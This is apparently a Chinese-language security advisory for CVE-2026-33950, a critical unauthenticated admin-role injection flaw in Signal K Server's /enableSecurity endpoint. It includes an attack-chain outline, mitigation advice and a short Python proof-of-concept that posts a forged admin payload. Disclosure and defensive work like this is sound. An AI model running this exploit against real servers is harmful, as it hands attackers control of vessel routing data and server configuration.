CVE-2026-33950 CVSS 9.4 严重

CVE-2026-33950 Signal K Server权限提升漏洞

披露日期: 2026-04-02

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-33950

漏洞类型

权限提升

CVSS评分

9.4 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Signal K Server

漏洞概述

Signal K Server在2.24.0-beta.4版本之前存在严重的权限提升漏洞。由于/enableSecurity接口存在管理员角色注入缺陷，未经身份认证的远程攻击者可以利用该漏洞获取服务器的完全管理员权限。成功利用此漏洞将允许攻击者篡改敏感的船舶路由数据、更改服务器关键配置并访问受限的API端点，严重威胁船舶航行安全及数据隐私。官方已在最新版本中修复了此问题。

技术细节

该漏洞的核心技术原理在于Signal K Server的/enableSecurity接口在处理安全初始化请求时，未能有效验证请求者的身份及角色参数。攻击者可以通过构造特定的HTTP POST请求，在请求体中恶意注入管理员权限标识。由于系统默认信任该接口的输入或缺乏必要的服务端校验机制，导致未认证用户（PR:N）能够绕过正常的身份认证流程，直接将自己提升为管理员角色。利用此漏洞无需任何用户交互（UI:N），攻击者可远程（AV:N）发起攻击。获取权限后，攻击者不仅能够访问受限端点，还能篡改船舶路由数据、修改服务器配置，对系统的机密性、完整性和可用性造成全面破坏，甚至可能对实体船舶的航行安全构成威胁。

攻击链分析

STEP 1

侦察

攻击者扫描网络发现开放的Signal K Server服务端口（默认为3000）。

STEP 2

漏洞利用

攻击者向/enableSecurity端点发送特制的HTTP POST请求，请求体中包含用于注入管理员角色的恶意参数。

STEP 3

权限提升

由于服务器未正确校验，攻击者成功绕过认证机制，获得服务器完全管理员权限。

STEP 4

控制与破坏

攻击者利用管理员权限修改船舶路由数据、篡改服务器配置或窃取敏感信息。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL of the Signal K Server
target_url = "http://<target-ip>:3000/enableSecurity"

# Malicious payload to inject Admin Role
# Exploiting the privilege escalation vulnerability
payload = {
    "admin": True,
    "role": "admin",
    "username": "attacker",
    "password": "pwned"
}

try:
    # Send POST request to inject admin role
    response = requests.post(target_url, json=payload)

    if response.status_code == 200:
        print("[+] Exploit successful! Admin privileges granted.")
        print("[+] Response:" + response.text)
    else:
        print("[-] Exploit failed. Status code:" + str(response.status_code))

except Exception as e:
    print(f"[!] Error occurred: {e}")

影响范围

Signal K Server < 2.24.0-beta.4

防御指南

临时缓解措施

建议立即更新至修复版本。如果无法立即升级，请通过防火墙规则阻止外部网络对服务器管理接口的访问，仅允许受信任的内部网络连接，并密切监控日志中是否存在对/enableSecurity接口的异常调用。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表